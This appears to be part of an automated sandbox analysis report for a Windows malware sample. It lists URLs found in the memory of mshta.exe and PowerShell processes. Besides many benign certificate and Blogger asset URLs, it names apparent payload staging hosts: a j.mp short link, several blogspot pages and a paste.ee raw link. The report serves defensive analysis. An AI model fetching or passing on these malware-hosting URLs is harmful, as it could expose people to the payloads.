Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: unknown

DNS traffic detected: queries for: j.mp

Source: unknown

Source: mshta.exe, 00000006.00000002.2308801585.0000000005947000.00000004.00000001.sdmp	String found in binary or memory: Https://www.blogger.com/share-post.g?blogID=9116518222795791100&pageID=8792113328696570758&target=pi
Source: powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: mshta.exe, 00000006.00000003.2221379994.0000000003B73000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: mshta.exe, 00000006.00000003.2221379994.0000000003B73000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
Source: powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
Source: powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
Source: mshta.exe, 00000006.00000003.2244847739.00000000080E4000.00000004.00000001.sdmp	String found in binary or memory: http://csi.gstatic.com/csi
Source: mshta.exe, 00000006.00000002.2277240561.0000000003D50000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2255231499.0000000002C00000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: mshta.exe, 00000006.00000002.2277240561.0000000003D50000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2255231499.0000000002C00000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp	String found in binary or memory: http://j.mp/
Source: mshta.exe, 00000006.00000003.2264502398.00000000003F5000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2269237459.0000000000430000.00000004.00000020.sdmp	String found in binary or memory: http://j.mp/dbgghasdnasdjasgdakgsdhv
Source: mshta.exe, 00000006.00000002.2279301165.0000000003F37000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2257266927.0000000002DE7000.00000002.00000001.sdmp, mshta.exe, 00000011.00000002.2226296090.00000000037E7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: mshta.exe, 00000006.00000002.2279301165.0000000003F37000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2257266927.0000000002DE7000.00000002.00000001.sdmp, mshta.exe, 00000011.00000002.2226296090.00000000037E7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: mshta.exe, 00000006.00000003.2246403287.00000000058DC000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.pki.goog/gs
Source: mshta.exe, 00000006.00000003.2221379994.0000000003B73000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.pki.goog/gsr202
Source: mshta.exe, 00000006.00000003.2221379994.0000000003B73000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.pki.goog/gts1o1core0
Source: mshta.exe, 00000006.00000003.2246403287.00000000058DC000.00000004.00000001.sdmp	String found in binary or memory: http://pki.goog/g
Source: mshta.exe, 00000006.00000002.2307607404.0000000005853000.00000004.00000001.sdmp	String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: mshta.exe, 00000006.00000003.2250091244.0000000003B4B000.00000004.00000001.sdmp	String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt05
Source: mshta.exe, 00000006.00000003.2221379994.0000000003B73000.00000004.00000001.sdmp	String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0C
Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp	String found in binary or memory: http://schema.org/BlogPosting
Source: mshta.exe, 00000006.00000002.2280946216.0000000004230000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2249204389.0000000002220000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: mshta.exe, 00000006.00000002.2279301165.0000000003F37000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2257266927.0000000002DE7000.00000002.00000001.sdmp, mshta.exe, 00000011.00000002.2226296090.00000000037E7000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: mshta.exe, 00000006.00000002.2279301165.0000000003F37000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2257266927.0000000002DE7000.00000002.00000001.sdmp, mshta.exe, 00000011.00000002.2226296090.00000000037E7000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: mshta.exe, 00000006.00000002.2280946216.0000000004230000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2249204389.0000000002220000.00000002.00000001.sdmp, mshta.exe, 00000011.00000002.2231119435.0000000004080000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: mshta.exe, 00000006.00000003.2242124105.00000000075EA000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2243633505.0000000008621000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2244847739.00000000080E4000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: mshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2308627180.000000000592E000.00000004.00000001.sdmp	String found in binary or memory: http://www.blogger.com/go/cookiechoices
Source: mshta.exe, 00000006.00000003.2242124105.00000000075EA000.00000004.00000001.sdmp	String found in binary or memory: http://www.cookiechoices.org/
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: mshta.exe, 00000006.00000002.2277240561.0000000003D50000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2255231499.0000000002C00000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: mshta.exe, 00000006.00000002.2279301165.0000000003F37000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2257266927.0000000002DE7000.00000002.00000001.sdmp, mshta.exe, 00000011.00000002.2226296090.00000000037E7000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: mshta.exe, 00000006.00000002.2277240561.0000000003D50000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2255231499.0000000002C00000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 0000000C.00000003.2212263434.00000000002F2000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 0000000C.00000003.2212263434.00000000002F2000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: powershell.exe, 0000000C.00000002.2255231499.0000000002C00000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: mshta.exe, 00000006.00000002.2308413634.0000000005903000.00000004.00000001.sdmp	String found in binary or memory: https://accounts.google.com/
Source: mshta.exe, 00000006.00000003.2221495845.0000000005903000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2246295022.0000000005886000.00000004.00000001.sdmp	String found in binary or memory: https://accounts.google.com/ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhtt
Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp	String found in binary or memory: https://apis.google.com
Source: mshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250960830.0000000003B3F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2309438572.0000000007590000.00000004.00000001.sdmp	String found in binary or memory: https://apis.google.com/js/plusone.js
Source: mshta.exe, 00000006.00000003.2251143360.00000000058E6000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2242751517.000000000018E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2262198982.00000000001B3000.00000004.00000001.sdmp	String found in binary or memory: https://backbones1234511a.blogspot.com/p/stback1.html
Source: mshta.exe, 00000006.00000003.2244847739.00000000080E4000.00000004.00000001.sdmp	String found in binary or memory: https://csi.gstatic.com/csi
Source: mshta.exe, 00000006.00000002.2308413634.0000000005903000.00000004.00000001.sdmp	String found in binary or memory: https://fonts.googleapis.com/
Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?lang=en-GB&family=Product
Source: mshta.exe, 00000006.00000003.2251143360.00000000058E6000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2242751517.000000000018E000.00000004.00000001.sdmp	String found in binary or memory: https://ghostbackbone123.blogspot.com/p/ghostbackup13.html
Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp	String found in binary or memory: https://i18n-cloud.appspot.com
Source: mshta.exe, 00000006.00000003.2266503969.0000000000128000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogs
Source: mshta.exe, 00000006.00000003.2266503969.0000000000128000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot
Source: mshta.exe, 00000006.00000003.2264460439.0000000003B3E000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/
Source: mshta.exe, 00000006.00000003.2251705614.0000000003480000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/(
Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/Q
Source: mshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276548700.0000000003B43000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2264460439.0000000003B3E000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/favicon.ico
Source: mshta.exe, 00000006.00000002.2309438572.0000000007590000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/favicon.icoe
Source: mshta.exe, 00000006.00000003.2262320859.00000000001CA000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/feeds/p
Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2264460439.0000000003B3E000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/feeds/posts/default
Source: mshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/feeds/posts/default?alt
Source: mshta.exe, 00000006.00000003.2250723670.000000000341C000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/feeds/posts/default?alt=rss
Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/feeds/posts/defaultA
Source: mshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/feeds/posts/defaultng
Source: mshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/js/cookienotice.js
Source: mshta.exe, 00000006.00000003.2221534508.000000000592E000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/js/cookienotice.jsA
Source: mshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/js/cookienotice.jsi
Source: mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/js/cookienotice.jsp
Source: mshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/js/cookienotice.jspnga
Source: mshta.exe, 00000006.00000003.2221466352.00000000058DC000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/p/
Source: mshta.exe, 00000006.00000002.2306384665.0000000005768000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/p/----
Source: mshta.exe, 00000006.00000003.2221466352.00000000058DC000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/p/X
Source: mshta.exe, 00000006.00000002.2306384665.0000000005768000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/p/nap
Source: mshta.exe, 00000006.00000003.2264460439.0000000003B3E000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.html
Source: mshta.exe, 00000006.00000002.2308413634.0000000005903000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.html%26bpli%3D1&followup=https://www.blogger.com/blogi
Source: mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.html.
Source: mshta.exe, 00000006.00000003.2264141461.0000000003A8C000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.html...
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.html0E)
Source: mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.html5
Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.html?interstitial=ABqL8_iitRI9UzgP0mZhOmXtKCBQT4eYHp3t
Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlC
Source: mshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlD
Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276419704.0000000003B29000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlK
Source: mshta.exe, 00000006.00000003.2220203351.0000000003474000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlabbr
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlcomment_from_post_iframe.js
Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmld
Source: mshta.exe, 00000006.00000003.2250153686.000000000040B000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmldnasdja
Source: mshta.exe, 00000006.00000003.2250153686.000000000040B000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmldnasdjasgdakgsdhv
Source: mshta.exe, 00000006.00000003.2246403287.00000000058DC000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlgspo
Source: mshta.exe, 00000006.00000003.2252538010.0000000002DE3000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlhttps://www.blogger.com/static/v1/jsbin/376796862-
Source: mshta.exe, 00000006.00000003.2245647822.0000000003AF4000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlkj
Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276419704.0000000003B29000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmls
Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276419704.0000000003B29000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlse
Source: mshta.exe, 00000006.00000003.2264141461.0000000003A8C000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlte
Source: mshta.exe, 00000006.00000003.2221495845.0000000005903000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlvg
Source: mshta.exe, 00000006.00000003.2251197338.0000000005857000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlw
Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlwidgets.js91100&pageID=8792113328696570758
Source: mshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2309438572.0000000007590000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2264460439.0000000003B3E000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/search
Source: mshta.exe, 00000006.00000003.2251705614.0000000003480000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/searchhttps://apis.google.com/js/plusone.js
Source: mshta.exe, 00000006.00000003.2221495845.0000000005903000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.cost2222.html
Source: powershell.exe, 0000000C.00000002.2240980870.000000000036F000.00000004.00000020.sdmp	String found in binary or memory: https://paste.ee/r/9IDWy
Source: mshta.exe, 00000006.00000003.2221379994.0000000003B73000.00000004.00000001.sdmp	String found in binary or memory: https://pki.goog/repository/0
Source: mshta.exe, 00000011.00000003.2221428662.0000000000125000.00000004.00000001.sdmp	String found in binary or memory: https://randikhanaekminar.blogspot.com/p/st2.html
Source: mshta.exe, 00000011.00000003.2218959976.0000000003A2C000.00000004.00000001.sdmp	String found in binary or memory: https://randikhanaekminar.blogspot.com/p/st2.htmlC:
Source: mshta.exe, 00000006.00000003.2251197338.0000000005857000.00000004.00000001.sdmp	String found in binary or memory: https://resources.blogblog.com/
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2250219385.0000000000430000.00000004.00000001.sdmp	String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000002.2276548700.0000000003B43000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmp	String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png)
Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp	String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png).meather)
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmp	String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png0C;
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp	String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.pngx6
Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp	String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.png
Source: mshta.exe, 00000006.00000003.2264675792.000000000585E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250127920.0000000003B45000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2251197338.0000000005857000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2307664079.0000000005858000.00000004.00000001.sdmp	String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.png)
Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp	String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.png:
Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp	String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.pngt.co
Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp	String found in binary or memory: https://resources.blogblog.com/img/icon18_edit_allbkg.gif
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp	String found in binary or memory: https://resources.blogblog.com/img/icon18_edit_allbkg.gifogID=9116518222795791100&zx=6c18238f-a384-4
Source: mshta.exe, 00000006.00000003.2250219385.0000000000430000.00000004.00000001.sdmp	String found in binary or memory: https://resources.blogblog.com/img/icon18_wrench_allbkg.png
Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp	String found in binary or memory: https://resources.blogblog.com/img/icon18_wrench_allbkg.png#
Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp	String found in binary or memory: https://resources.blogblog.com/img/icon18_wrench_allbkg.png;
Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp	String found in binary or memory: https://resources.blogblog.com/img/icon18_wrench_allbkg.pngk
Source: mshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmp	String found in binary or memory: https://resources.blogblog.com/img/icon18_wrench_allbkg.pngq
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp	String found in binary or memory: https://resources.blogblog.com/img/icon18_wrench_allbkg.pngrom_post_iframe.js
Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276419704.0000000003B29000.00000004.00000001.sdmp	String found in binary or memory: https://resources.blogblog.com/img/triangle_ltr.gif
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmp	String found in binary or memory: https://resources.blogblog.com/img/triangle_ltr.gif)
Source: mshta.exe, 00000006.00000002.2276419704.0000000003B29000.00000004.00000001.sdmp	String found in binary or memory: https://resources.blogblog.com/img/triangle_open.gif
Source: mshta.exe, 00000006.00000003.2244847739.00000000080E4000.00000004.00000001.sdmp	String found in binary or memory: https://resources.blogblog.com/img/widgets/icon_contactform_cross.gif
Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2264900339.000000000047B000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276419704.0000000003B29000.00000004.00000001.sdmp	String found in binary or memory: https://resources.blogblog.com/img/widgets/s_bottom.png
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmp	String found in binary or memory: https://resources.blogblog.com/img/widgets/s_bottom.png)
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276419704.0000000003B29000.00000004.00000001.sdmp	String found in binary or memory: https://resources.blogblog.com/img/widgets/s_top.png
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmp	String found in binary or memory: https://resources.blogblog.com/img/widgets/s_top.png)
Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp	String found in binary or memory: https://s.ytimg.com
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: mshta.exe, 00000006.00000003.2251143360.00000000058E6000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2242751517.000000000018E000.00000004.00000001.sdmp	String found in binary or memory: https://startthepartyup.blogspot.com/p/backbone14.html
